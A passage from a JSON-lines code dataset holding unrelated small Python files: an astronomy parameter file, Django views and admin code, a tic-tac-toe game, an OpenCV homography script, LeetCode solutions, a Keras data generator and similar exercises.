abundance\n #appropriate for those along the line of sight to the Trapezium stars in Orion (see CLOUDY documentation\n # Hazy 1 for more info). (Default: False)\n#****************\n# Post-AGB STARS\n#****************\n\nadd_pagb_stars = False \t\t\t # If set, the Post-AGB stars are included when calculating nebular emission\n # # This works only when add_neb_emission = True and use_cloudy_tables = False (Default: False)\n\nPAGB_N_enhancement = 0.4 \t\t\t # Enhances the Nitrogen abundance Post-AGB stars by increasing the log(N/O) by this value. \n \t\t\t # This used only when add_neb_emission = True, use_cloudy_tables = False and add_pagb_stars = True (Default = 0.4) \n\nPAGB_C_enhancement = 0.4 \t\t\t # Enhances the Carbon abundance Post-AGB stars by increasing the log(C/O) by this value.\n \t\t\t # This used only when add_neb_emission = True, use_cloudy_tables = False and add_pagb_stars = True (Default = 0.4)\n\nPAGB_Rinner_per_Rs = 0.01 \t\t # Rinner for cloudy calculations is set to this value times the Stromgen Radius. \n \t\t\t # For example, if set to 0.01 Rinner is taken to be 1 % of Stromgren Radius. \n \t\t\t # If FORCE_inner_radius (next parameter) is set to True then this is overridden\n \t\t\t # and the value set by the inner_radius is used. This parameter is used \n \t\t\t # only when add_neb_emission = True and use_cloudy_tables = False (Default: 0.01)\n\nPAGB_nh = 1.e2 \t\t\t # Gas hydrogen density for calcualting nebular emission in units if cm^-3. \n \t\t\t # This is used only when add_neb_emission = True and use_cloudy_tables = False (Default = 1.e2)\n\nPAGB_min_age = 0.1 \t\t \t# Sets the minimum age limit for calculating nebular emission from post-AGB stars, in units of Gyr.\n \t\t\t # This is used only when add_neb_emission = True, use_cloudy_tables = False and add_pagb_stars = True (Default = 0.1)\n\nPAGB_max_age = 10 \t\t\t # Sets the maximum age limit for calculating nebular emission from post-AGB stars, in units of Gyr.\n \t\t\t # This is used only when add_neb_emission = True, use_cloudy_tables = False and add_pagb_stars = True (Default = 10)\n\nPAGB_escape_fraction = 0.0 \t\t\t # Fraction of H-ionizaing photons that escape the HII region. \n \t\t\t # This is used only when add_neb_emission = True and use_cloudy_tables = False (Default = 0.0)\n\n#**************\n# AGN\n#**************\n\nadd_AGN_neb = False\t\t\t\t # If set, AGNs are included when calculating nebular emission.\n # # This works only when add_neb_emission = True and use_cloudy_tables = False (Default: False)\n\nAGN_nh = 1.e3\t\t\t\t\t # Gas hydrogen density for calcualting nebular emission in units if cm^-3. \n \t\t\t # This is used only when add_neb_emission = True and use_cloudy_tables = False (Default = 1.e2)\n\nAGN_num_gas = 32\t\t\t\t\t\t\t# For CLOUDY calculations we use the distance weighted average metallicity of gas particles around the AGN. \n\t\t\t \t\t\t\t\t# The number of gas particles used for doing so is set by this parameter. (Default: 32)\n\n#**********************\n# DIffused Ionized Gas (DIG)\n#**********************\n\nadd_DIG_neb = False # If set, Contribution from DIG is included when calculating nebular emission \n # This works only when add_neb_emission = True and use_cloudy_tables = False (Default: False)\n\nDIG_nh = 1.e1 # Gas hydrogen density for calcualting nebular emission in units of cm^-3. (Default: 10)\n \n\nDIG_min_logU = -6.0 # Only gas cells with ionization parameter greater than this are considered for DIG calculation. \n # This is done so as to speed up the calculation by ignoring the cells that do not have enough energy \n # to produce any substantial emission. (Defualt: -6.0)\n\nuse_black_sed = False # If set, Black et al.(1987) ISRF is used as the input SED shape for DIG CLOUDY calculations \n # else, the input SED shape is calulated by by taking a distance weighted average of the CLOUDY \n # output spectrum of nearby stars. The normalization of the SED is set by the total energy \n # above the lyman limit dumped in each cell. (Default: False)\n\nstars_max_dist = 1 # Only stars within this distance are considered for getting the input spectrum shape. (Units: Kpc)\n # This is used only when use_black_sed = False (Default = 1)\n\nmax_stars_num = 20 # This sets the upper limit on the number of stars that are used for calculating the input spectrum shape.\n # This is used only when use_black_sed = False (Default = 20)\n#*************************\n# DEBUGGING AND CLEAN UP\n#*************************\n\ndump_emlines = False # If True, The emission lines are saved in a file before going through the dust radiative transfer. \n # These are the cloudy computed emission line strengths, and are calculated for all lines\n # cloudy calculates (i.e. not just those undergoing radiative transfer). The format for the output \n # is a wavelength array,followed by a (nlam+2) list for each nebular emission bearing particle. \n # The +2 in the (nlam+2) list are the O/H ratio and the id of that particle. With id = 0 , 1, 2 and 3 \n # corresponds to young stars, PAGB stars, AGN and DIG respectively. There is a convenience package in \n # /convenience to help read in this file. This can be used as a fast way getting emission lines for the \n # purpose of debugging the code. Naming convention: emlines.galaxy*.txt where * is the galaxy number. \n # This works only when add_neb_emission = True (Default: False) \n\ncloudy_cleanup = True # If set to True, all the CLOUDY files will be deleted after the source addition is complete. \n # Only relevant if add_neb_emission = True and use_cloudy_tables = False (Default: True)\n\n#===============================================\n#DEBUGGING -THE PERFORMANCE OF THE CODE USING THESE PARAMETERS IS NOT GUARANTEED\n#===============================================\nNEB_DEBUG = False # Dumps parameters related to nebular line emission in a file for debugging.\n # The file includes the ionization parameter, number of ionizing photons, \n # metallicity, inner radius, stellar mass and age for each particle.\n # Naming convention: nebular_properties_galaxy*.txt where * is the galaxy number\n\nSAVE_NEB_SEDS = False # If set, the CLOUDY output SEDs are saved in a file \n","repo_name":"dnarayanan/powderday","sub_path":"parameters_master_neb.py","file_name":"parameters_master_neb.py","file_ext":"py","file_size_in_byte":18293,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"72"} +{"seq_id":"28365110406","text":"# Zad 2. Stwórz słownik skrótów powszechnie używanych w gazetach lub artykułach internetowych. Jako klucz przyjmij\n# skrót danego słowa, wartość to rozwinięcie tego skrótu.\n\n# pusty słownik skrótów\nskroty = {}\n\n# dodawanie par klucz - wartość do słownika\nskroty['al.'] = 'aleja'\nskroty['cd.'] = 'ciąg dalszy'\nskroty['dr'] = 'doktor'\nskroty['itd.'] = 'i tak dalej'\nskroty['itp.'] = 'i tym podobne'\n\n# wyświetlenie wszystkich danych ze słownika\nprint(\"Zawartość slownika 'skroty':\")\nfor key in skroty.keys():\n print(f\"{key} - {skroty[key]}\")\n","repo_name":"UWMKacper/WizualizacjaDanych","sub_path":"Praca_domowa/Lab2/Zad2.py","file_name":"Zad2.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15491163147","text":"from .serialization import snipetSerializer\nfrom rest_framework.parsers import JSONParser\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom .models import snipet\n# Create your views here.\n\n\n# @api_view(['GET', 'POST', 'PUT'])\n@csrf_exempt\ndef home(req):\n\n if req.method == 'GET':\n snip = snipet.objects.all()\n se = snipetSerializer(snip, many=True)\n return Response(se.data, content_type='application/xml')\n\n elif req.method == 'POST':\n data = JSONParser().parse(req)\n se = snipetSerializer(data=data)\n\n if se.is_valid():\n se.save()\n return Response(se.data, content_type='application/xml')\n return Response(se.error_messages)\n return Response('hello', content_type='application/xml')\n\n\n@csrf_exempt\ndef all(req, pk):\n\n try:\n mo = snipet.objects.get(pk=pk)\n except snipet.DoesNotExist:\n return Response(status=404)\n\n if req.method == 'GET':\n se = snipetSerializer(mo)\n return Response(se.data)\n\n if req.method == 'PUT':\n data = JSONParser().parse(req)\n se = snipetSerializer(mo, data=data)\n if se.is_valid():\n se.save()\n return Response(se.data)\n return Response(se.error_messages)\n","repo_name":"ibar2/studing-django-projects","sub_path":"serialization/req/se/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72965179432","text":"board = [\"-\",\"-\",\"-\",\r\n \"-\",\"-\",\"-\",\r\n \"-\",\"-\",\"-\",]\r\n\r\ngame_on = True \r\n\r\nwinner = None\r\n\r\ncurrent_player = input(\"Choose a X or O\").upper()\r\n\r\n\r\ndef display_board():\r\n print( board[0] + \" | \" + board[1] + \" |\" + board[2])\r\n print(\"__|___|__\")\r\n print( board[3] + \" | \" + board[4] + \" |\" + board[5])\r\n print(\"__|___|__\")\r\n print( board[6] + \" | \" + board[7] + \" |\" + board[8]) \r\n print(\" | | \")\r\n\r\ndef play_game():\r\n\r\n display_board()\r\n\r\n while game_on: \r\n \r\n handle_turn(current_player)\r\n\r\n check_gameover() #yo function bitra 2 function call garya cha [check_if_win],[check_if_draw] maile chai draw mai halko chu down below\r\n\r\n flip_player()\r\n\r\n if winner == \"X\" or winner ==\"O\":\r\n print(winner + \" is the winner.\")\r\n #elif winner ==none: while loop bhitra cha every time yo condition hercha\r\n # print (\"Its a draw.\") \r\n \r\ndef handle_turn(player):\r\n\r\n print(player + \"'s turn.\")\r\n position = input(\"choose a number from 1-9: \")\r\n\r\n valid = False\r\n while not valid:\r\n\r\n while position not in [\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\"]:\r\n position = input(\"invalid input, choose from 1-9:\")\r\n\r\n position = int(position) - 1 \r\n\r\n if board[position] == \"-\":\r\n valid = True\r\n else: \r\n print(\"invalid move, try again.\")\r\n\r\n board[position] = player\r\n\r\n display_board()\r\n\r\ndef check_gameover():\r\n check_if_win()\r\n check_if_draw()\r\n\r\ndef check_if_win():\r\n\r\n global winner\r\n\r\n # check rows\r\n row_winner = check_rows()\r\n \r\n # check columns\r\n columns_winner = check_columns()\r\n\r\n # check diagonals\r\n diagonal_winner = check_diagonals()\r\n\r\n if row_winner:\r\n winner = row_winner\r\n\r\n elif columns_winner:\r\n winner = columns_winner\r\n\r\n elif diagonal_winner:\r\n winner = diagonal_winner \r\n\r\n return \r\n\r\ndef check_rows():\r\n global game_on\r\n row_1 = board[0] == board[1] == board[2] != \"-\"\r\n row_2 = board[3] == board[4] == board[5] != \"-\"\r\n row_3 = board[6] == board[7] == board[8] != \"-\"\r\n\r\n if row_1 or row_2 or row_3:\r\n game_on = False\r\n\r\n if row_1:\r\n return board[0]\r\n\r\n elif row_2:\r\n return board[3]\r\n\r\n elif row_3:\r\n return board[6] \r\n return\r\n\r\ndef check_columns():\r\n global game_on\r\n column_1 = board[0] == board[3] == board[6] != \"-\"\r\n column_2 = board[1] == board[4] == board[7] != \"-\"\r\n column_3 = board[2] == board[5] == board[8] != \"-\"\r\n\r\n if column_1 or column_2 or column_3:\r\n game_on = False\r\n\r\n if column_1:\r\n return board[0]\r\n\r\n elif column_2:\r\n return board[1]\r\n\r\n elif column_3:\r\n return board[2] \r\n\r\n return \r\n\r\ndef check_diagonals():\r\n global game_on\r\n diagonal_1 = board[0] == board[4] == board[8] != \"-\"\r\n diagonal_2 = board[2] == board[4] == board[6] != \"-\"\r\n \r\n if diagonal_1 or diagonal_2:\r\n game_on = False\r\n\r\n if diagonal_1:\r\n return board[0]\r\n\r\n elif diagonal_2:\r\n return board[2]\r\n \r\n return\r\n\r\ndef check_if_draw():\r\n global game_on\r\n if \"-\" not in board: \r\n print(\"Its a Draw\")#maile yaa simple print haleko chu \r\n game_on = False\r\n \r\n\r\n return\r\n\r\ndef flip_player():\r\n global current_player\r\n if current_player == \"X\":\r\n current_player = \"O\"\r\n else :\r\n current_player = \"X\"\r\n\r\n return \r\nplay_game() ","repo_name":"Debendra-Shakya/tictactoeinPython","sub_path":"tic.py","file_name":"tic.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1033513362","text":"#UDP与TCP的区别\n#udp协议不需要建立连接,速度快(不稳定)\ns=socket.socket(socket.AF_INET,socket>SOCK_DGRAM)\ns.bind(('127.0.0.1',9999))\n\nprint('Bind UDP on 9999...')\nwhile Thre:\n\t#接收数据\n\tdata,addr=s.recvfrom(1024)\n\tprint('Received from %s:%s.'%addr)\n\ts.sendto(b'Hello,%s!'%data,addr)\n","repo_name":"553672759/xxgit","sub_path":"python/old/liaoxuefeng/UDPbiancheng.py","file_name":"UDPbiancheng.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28992211364","text":"import cv2\r\nimport numpy as np\r\n\r\nbillboard = cv2.imread(\"billboard3.jpg\")\r\nbillboard_copy = billboard.copy()\r\nimage = cv2.imread(\"hadis2.jpg\")\r\n\r\n# Found points of billboard and setting image points\r\nbillboard_points = np.array([[136, 67], [490, 69], [487, 247], [138, 250]])\r\nimage_points = np.array([[0,0], [image.shape[1], 0], [image.shape[1], image.shape[0]], [0, image.shape[0]]])\r\n\r\n# found matrix of banner and change it\r\nmatrix_location, mask = cv2.findHomography(image_points, billboard_points)\r\nresult1 = cv2.warpPerspective(image, matrix_location, (billboard.shape[1], billboard.shape[0]))\r\n\r\n# Fill billboard with image\r\ncv2.fillConvexPoly(billboard_copy, billboard_points, 0, 16)\r\nresult2 = billboard_copy + result1\r\n\r\ncv2.imshow(\"billboard\", billboard)\r\ncv2.imshow(\"image\", image)\r\ncv2.imshow(\"result1\", result1)\r\ncv2.imshow(\"result2\", result2)\r\n\r\ncv2.imwrite(\"Banner_Picture.png\", result2)\r\n\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n\r\n","repo_name":"EmadOldin/Opencv_Project","sub_path":"Change_BillBoard(homography)2.2.py","file_name":"Change_BillBoard(homography)2.2.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"22219385766","text":"from tkinter import *\nimport random\nimport pandas as pd\ncard_num = 0\nBACKGROUND_COLOR = \"#B1DDC6\"\n\n\ndef reveal_meaning():\n global card_num\n\n next_button.grid_forget()\n right_button.grid(row=1, column=1)\n wrong_button.grid(row=1, column=0)\n del_button.grid(row=1, column=0, columnspan=2)\n card.itemconfig(card_img, image=card_back_img)\n card.itemconfig(language, text=\"English\")\n card.itemconfig(word, text=words_dict[card_num % len(words_dict)]['English'])\n\n card_num += 1\n\n\ndef next_card():\n card.itemconfig(card_img, image=card_front_img)\n card.itemconfig(word, text=words_dict[card_num % len(words_dict)]['French'])\n card.itemconfig(language, text=\"French\")\n next_button.grid(row=1, column=0, columnspan=2)\n right_button.grid_forget()\n wrong_button.grid_forget()\n del_button.grid_forget()\n\n\ndef delete_card():\n global card_num\n\n words_dict.remove(words_dict[card_num - 1])\n print(words_dict)\n pd.DataFrame(words_dict).to_csv(\"./data/unlearned_words.csv\", index=False)\n card_num -= 1\n next_card()\n\n\nwindow = Tk()\n\nwindow.title(\"Language Flash Cards\")\nwindow.config(padx=50, pady=50)\n\nwords = pd.read_csv(\"./data/unlearned_words.csv\")\nwords_dict = words.to_dict(orient=\"records\")\n\nrandom.shuffle(words_dict)\n\nprint(words_dict)\n\ncard = Canvas(width=800, height=526)\ncard_front_img = PhotoImage(file=\"./images/card_front.png\")\ncard_back_img = PhotoImage(file=\"./images/card_back.png\")\ncard_img = card.create_image(415,250, image=card_front_img)\nlanguage = card.create_text(400, 150, text=\"French\", font=(\"Arial\", 40, \"italic\"))\nword = card.create_text(400, 283, text=words_dict[0]['French'], font=(\"Arial\", 60, \"bold\"))\ncard.grid(row=0, column=0, columnspan=2)\n\ncorrect_img = PhotoImage(file=\"./images/right.png\")\nright_button = Button(image=correct_img, command=next_card)\n\nwrong_img = PhotoImage(file=\"./images/wrong.png\")\nwrong_button = Button(image=wrong_img, command=next_card)\n\nnext_img = PhotoImage(file=\"./images/next.png\")\nnext_button = Button(image=next_img, command=reveal_meaning)\n\ndel_img = PhotoImage(file=\"./images/delete.png\")\ndel_button = Button(image=del_img, command=delete_card)\n\nnext_card()\n\nwindow.mainloop()\n","repo_name":"ZuhairQureshi/Python-Projects-100-Days","sub_path":"flash-card-project/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43219742415","text":"# -*- coding: utf-8 -*-\n\ndef balancer(string_eval):\n\n item_char_list = list(string_eval)\n stack_list = []\n num_par_open = item_char_list.count('(')\n num_par_close = item_char_list.count(')')\n\n list_of_indexes_open = []\n list_of_indexes_close = []\n\n if num_par_open != num_par_close:\n print(\"Los paréntesis no están bien balanceados\")\n else:\n index_pair = 0\n # for valor in item_char_list:\n\n for index_pair in range(0, len(item_char_list) - 1):\n if item_char_list[index_pair] == '(':\n stack_list.append(item_char_list[index_pair])\n # index_open += 1\n # list_of_indexes_open.append(index_open)\n # index_pair += 1\n elif item_char_list[index_pair] == ')' and len(stack_list) > 0:\n stack_list.pop()\n # index_close += 1\n # list_of_indexes_close.append(index_close)\n\n index_pair += 1\n\n index_open = 0\n index_close = 0\n\n index_pair = 0\n\n stack_balanced = [None] * len(string_eval*2)\n\n for index_pair in range(len(item_char_list)):\n if item_char_list[index_pair] == '(':\n list_of_indexes_open.append(index_open)\n index_open += 1\n elif item_char_list[index_pair] == ')':\n list_of_indexes_close.append(index_close)\n index_close += 1\n\n index_pair += 1\n\n if num_par_open != num_par_close:\n if num_par_open != len(list_of_indexes_close):\n for i in list_of_indexes_open:\n stack_balanced.append('(')\n stack_balanced.remove(None)\n elif num_par_open > 0:\n for i in list_of_indexes_open:\n stack_balanced[i] = '('\n stack_balanced.remove(None)\n else:\n for item in item_char_list:\n stack_balanced.append(item)\n stack_balanced.remove(None)\n\n if num_par_close != len(list_of_indexes_open):\n for i in reversed(list_of_indexes_open):\n stack_balanced.append(')')\n stack_balanced.remove(None)\n elif num_par_close > 0:\n for i in list_of_indexes_close:\n stack_balanced[i] = ')'\n stack_balanced.remove(None)\n else:\n for item in item_char_list:\n stack_balanced.append(item)\n stack_balanced.remove(None)\n\n parenthesis_balanced_string = \"\"\n\n for item in stack_balanced:\n if item is not None:\n parenthesis_balanced_string += item\n\n if len(stack_list) == 0:\n print(\"Los paréntesis están bien balanceados\")\n\n print(\"num_char_open: \", num_par_open)\n print(\"num_char_close: \", num_par_close)\n print(\"stack_list: \", stack_list)\n print(\"list_of_indexes: \\n open: {}, \\n closed: {}\".format(list_of_indexes_open, list_of_indexes_close))\n # print(\"Stack_Balanced: \", stack_balanced)\n print(\"String_Balanced: \", parenthesis_balanced_string)\n\n\nif __name__ == \"__main__\":\n\n # cadena = \"(((()))((((((()))))((()))(()())))((()))))))))))))))))\"\n # cadena = \"(((((((((((((((((((())))))))))))))))))))\"\n cadena = \"(()\"\n\n balancer(cadena)\n","repo_name":"jorgeMorfinezM/parenthesis_balance_test","sub_path":"balanced_par.py","file_name":"balanced_par.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74215301672","text":"# coding: utf-8\n\nimport sys \nreload(sys) \nsys.setdefaultencoding('utf-8') \n\nfrom django.contrib import admin\nfrom .models import Poem\nfrom django.contrib.auth.admin import UserAdmin\nfrom django.contrib.auth.models import User\n\n#子类化UserAdmin\nclass MyUserAdmin(UserAdmin):\n\t#修改要显示的字段\n\tlist_display = ('email','first_name','last_name', 'is_staff')\n\t#修改过滤器\n\tlist_filter = ('is_staff', 'last_name')\n\n\tsearch_fields = ('last_name',)\n\n#先取消对User的注册再用MyUserAdmin对其重新注册\nadmin.site.unregister(User)\nadmin.site.register(User, MyUserAdmin)\n\n#class PoemModelAdmin(admin.ModelAdmin):\n#\tclass Meta:\n#\t\tmodel = Poem\n#\t#定义要显示的字段\n#\tlist_display = ['title', 'author']\n#\t#定义要显示为链接的字段\n#\tlist_display_links = ['author']\n#\t#定义搜索框 可以搜索的字段\n#\tsearch_fields = ['title', 'author']\n#\t#定义可编辑的字段\n#\tlist_editable = ['title']\n#\t#定义可作为过滤器的字段\n#\tlist_filter = ['author']\n#\n#\t#定义显示模板\n#\tchange_form_template = 'change_form.html'\n#admin.site.register(Poem, PoemModelAdmin)\n\nfrom django import forms\nfrom .models import Poem\nfrom .forms import SetTypeForm\nfrom django.shortcuts import render\n#自定义widget\nclass SubInputText(forms.TextInput):\n\tclass Media:\n\t\tcss = {\n\t\t\t'all':('input.css',)\t\n\t\t}\n\nclass PoemForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Poem\n\t\tfields = ['author', 'title', 'type']\n\t\twidgets = {\n\t\t\t#设置author的显示方式为文本域\n\t\t\t'author':forms.Textarea(attrs = {'cols':20, 'rows':1}),\t\n\t\t\t#设置title为自定义widget SubInputText \n\t\t\t'title':SubInputText(),\n\t\t\t#设置为单选按钮\n\t\t\t'type':forms.RadioSelect,\n\t\t}\n\t\t\n\nclass PoemModelAdmin(admin.ModelAdmin):\n\t\n\t#自定义action\n\tdef print_poem(self, request, queryset):\n\t\tfor qs in queryset:\n\t\t\tprint(qs)\n\t\n\tdef set_type(self, request, queryset):\n\t\tif request.POST.get('post'):\n\t\t\tform = SetTypeForm(request.POST)\n\t\t\tif form.is_valid():\n\t\t\t\ttype = form.cleaned_data['type']\n\t\t\t\tfor qs in queryset:\n\t\t\t\t\tqs.type = type \n\t\t\t\t\tqs.save()\n\t\t\t\t#设置action执行成功的消息提示\n\t\t\t\tself.message_user(request, \"%d poems were changed type %d\" % (len(queryset),type))\n\n\t\telse:\n\t\t\treturn render(request, 'set_type.html', {'form':SetTypeForm(initial={'_selected_action':request.POST.getlist(admin.ACTION_CHECKBOX_NAME)}),\n\t\t\t\t'objects':queryset})\n\t\t\t\n\t#删除不需要的全局action\n\tdef get_actions(self, request):\n\t\tactions = super(PoemModelAdmin, self).get_actions(request)\n\t\tif 'hello' in actions:\n\t\t\tdel actions['hello']\n\t\treturn actions\n\n\t#设置set_type action的显示名称\n\tset_type.short_description = \"set_type_action\"\n\n\tform = PoemForm\n\tactions = [print_poem,set_type]\n\t#禁用所有action\n\t#actions = None\nadmin.site.register(Poem, PoemModelAdmin)\n\n#添加全局action\ndef sayHello(modelname, request, queryset):\n\tprint('hello')\nadmin.site.add_action(sayHello, 'hello')\n#全局禁止action\nadmin.site.disable_action('delete_selected')\n","repo_name":"cityking/python_07_custom_field","sub_path":"custom_field/fieldapp/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38899239089","text":"# Source : https://leetcode.com/problems/is-graph-bipartite/description/\n\n# Algo/DS : Graph, BFS, Bipartite\n\n# Complexity : O(V+E)\n\nclass Solution(object):\n def isBipartite(self, graph):\n \"\"\"\n :type graph: List[List[int]]\n :rtype: bool\n \"\"\"\n \n # set initial color for all to 0\n color = [0] * len(graph)\n visited =[False] * len(graph)\n \n # for loop is needed so that all disconnect nodes can be covered\n for i in range(len(graph)):\n\n # if already visited or no neighbor then skip this node\n if visited[i] or len(graph[i]) == 0: continue\n \n # set color to 1 and start BFS\n color[i] = 1\n queue = [i]\n while queue:\n node = queue.pop(0)\n visited[node] = True \n for neigh in graph[node]:\n if color[neigh] == color[node]: return False\n\n # if neighbour is not visited then set color and add to queue\n if not visited[neigh]: \n color[neigh] = -color[node]\n queue.append(neigh)\n \n return True","repo_name":"neelamy/Leetcode","sub_path":"Graph/785_IsGraphBipartite?.py","file_name":"785_IsGraphBipartite?.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23774248811","text":"'''\n4Sum II\n\nGiven four integer arrays nums1, nums2, nums3, and nums4 all of length n, return the number of tuples (i, j, k, l) such that:\n\n 0 <= i, j, k, l < n\n nums1[i] + nums2[j] + nums3[k] + nums4[l] == 0\n\n \n\nExample 1:\n\nInput: nums1 = [1,2], nums2 = [-2,-1], nums3 = [-1,2], nums4 = [0,2]\nOutput: 2\nExplanation:\nThe two tuples are:\n1. (0, 0, 0, 1) -> nums1[0] + nums2[0] + nums3[0] + nums4[1] = 1 + (-2) + (-1) + 2 = 0\n2. (1, 1, 0, 0) -> nums1[1] + nums2[1] + nums3[0] + nums4[0] = 2 + (-1) + (-1) + 0 = 0\n\nExample 2:\n\nInput: nums1 = [0], nums2 = [0], nums3 = [0], nums4 = [0]\nOutput: 1\n\n \n\nConstraints:\n\n n == nums1.length\n n == nums2.length\n n == nums3.length\n n == nums4.length\n 1 <= n <= 200\n -228 <= nums1[i], nums2[i], nums3[i], nums4[i] <= 228\n\n'''\nclass Solution:\n def fourSumCount(self, nums1: [int], nums2: [int], nums3: [int], nums4: [int]) -> int:\n count = 0\n num1_2 = {}\n for num1 in nums1:\n for num2 in nums2:\n num1_2[num1+num2] = num1_2.get(num1+num2, 0) + 1\n for num3 in nums3:\n for num4 in nums4:\n if -(num3+num4) in num1_2:\n count += 1*num1_2[-(num3+num4)]\n return count\n\n#leetcode, fastest\nclass Solution:\n def fourSumCount(self, nums1: List[int], nums2: List[int], nums3: List[int], nums4: List[int]) -> int:\n counter1 = Counter(nums1)\n counter2 = Counter(nums2)\n counter3 = Counter(nums3)\n counter4 = Counter(nums4)\n\n ans = 0\n\n counterA = defaultdict(int)\n for n1, cnt1 in counter1.items():\n for n2, cnt2 in counter2.items():\n counterA[n1+n2] += cnt1 * cnt2\n counterB = defaultdict(int)\n for n3, cnt3 in counter3.items():\n for n4, cnt4 in counter4.items():\n counterB[n3+n4] += cnt3 * cnt4\n\n for n1n2, cntA in counterA.items():\n if -n1n2 in counterB:\n ans += cntA * counterB[-n1n2]\n\n return ans\n\n#stefan pochman\ndef fourSumCount(self, A, B, C, D):\n AB = collections.Counter(a+b for a in A for b in B)\n return sum(AB[-c-d] for c in C for d in D)\n\n\nnums1 = [1,2]\nnums2 = [-2,-1]\nnums3 = [-1,2]\nnums4 = [0,2]\n# Output: 2\n\n# nums1 = [0]\n# nums2 = [0]\n# nums3 = [0]\n# nums4 = [0]\n# # Output: 1\n\nnums1 = [-1,-1]\nnums2 = [-1,1]\nnums3 = [-1,1]\nnums4 = [1,-1]\n#Output: 6\n\nsol = Solution()\nprint(sol.fourSumCount(nums1, nums2, nums3, nums4))\n","repo_name":"jomesh18/Leetcode","sub_path":"Hash Table/fourSumCount.py","file_name":"fourSumCount.py","file_ext":"py","file_size_in_byte":2454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70716293033","text":"#Data Generator\nclass generator(keras.utils.Sequence):\n\n def __init__(self, folder, filenames, pneumonia_locations=None, batch_size=32,\n image_size=256, shuffle=True, augment=False, predict=False):\n self.folder = folder\n self.filenames = filenames\n self.pneumonia_locations = pneumonia_locations\n self.batch_size = batch_size\n self.image_size = image_size\n self.shuffle = shuffle\n self.augment = augment\n self.predict = predict\n self.on_epoch_end()\n\n def __load__(self, filename):\n # load dicom images into np.array\n img = pydicom.dcmread(os.path.join(self.folder, filename)).pixel_array\n\n # create empty mask\n msk = np.zeros(img.shape)\n filename = filename.split('.')[0]\n\n # if img contains pneumonia\n if filename in self.pneumonia_locations:\n for location in self.pneumonia_locations[filename]:\n x,y,w,h = location\n msk[y:y+h, x:x+w] = 1\n\n img = resize(img, (self.image_size, self.image_size), mode='reflect')\n msk = resize(msk, (self.image_size, self.image_size), mode='reflect') > 0.5\n\n if self.augment and random.random() >0.5:\n img = np.fliplr(img)\n msk = np.fliplr(msk)\n\n # trailing channel dimension?\n img = np.expand_dims(img, -1)\n msk = np.expand_dims(msk, -1)\n return img, msk\n\n def __loadpredict__(self, filename):\n img = pydicom.dcmread(os.path.join(self.folder, filename)).pixel_array\n img = resize(img, (self.image_size, self.image_size), mode='reflect')\n img = np.expand_dims(img, -1)\n return img\n\n def __getitem__(self, index):\n filenames = self.filenames[index*self.batch_size:(index+1)*self.batch_size]\n\n if self.predict:\n # load files\n imgs = [self.__loadpredict__(filename) for filename in filenames]\n # create np batch\n imgs = np.array(imgs)\n return imgs, filenames\n\n # train mode: return img & masks\n else:\n # load files\n items = [self.__load__(filename) for filename in filenames]\n # unzip imgs and msks\n imgs, msks = zip(*items)\n # create np batch\n imgs = np.array(imgs)\n msks = np.array(msks)\n return imgs, msks\n\n def on_epoch_end(self):\n if self.shuffle:\n random.shuffle(self.filenames)\n\n def __len__(self):\n if self.predict:\n # return everything\n return int(np.ceil(len(self.filenames)/self.batch_size))\n else:\n # return full batches only\n return int(len(self.filenames)/self.batch_size) ","repo_name":"jumbobae/Pneumonia_Detection_CNN","sub_path":"utils/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11687901356","text":"lines = open(\"/proc/net/dev\", \"r\").readlines()\n\ncolumnLine = lines[1]\n_, receiveCols , transmitCols = columnLine.split(\"|\")\nreceiveCols = map(lambda a:\"recv_\"+a, receiveCols.split())\ntransmitCols = map(lambda a:\"trans_\"+a, transmitCols.split())\n\ncols = receiveCols+transmitCols\n\nfaces = {}\nfor line in lines[2:]:\n if line.find(\":\") < 0: continue\n face, data = line.split(\":\")\n faceData = dict(zip(cols, data.split()))\n faces[face.strip()] = faceData\n\nimport pprint\npprint.pprint(faces)\n","repo_name":"wiliamsouza/playground","sub_path":"proc_net_dev.py","file_name":"proc_net_dev.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"23029428155","text":"import logging as log\nimport multiprocessing as mp\nimport os\nimport sys\nfrom tqdm import tqdm\n\n# Local modules\nsys.path.append(\"..\") # Use the modules in the top level directory\nimport Analysis.ResultSummary as ARS\nimport MultiProc.ConfigHelp as MPCH\nimport IO.MultiResultReader as IOMRR\nimport IO.NamingConventions as IONC\nimport Plotting.DefaultFormat as PDF\nimport Plotting.SetupPlotting as PSP\n\n\"\"\" Create the individual summary plots for each result, e.g. the covariance \n matrix, the fit behavious, the individual parameter 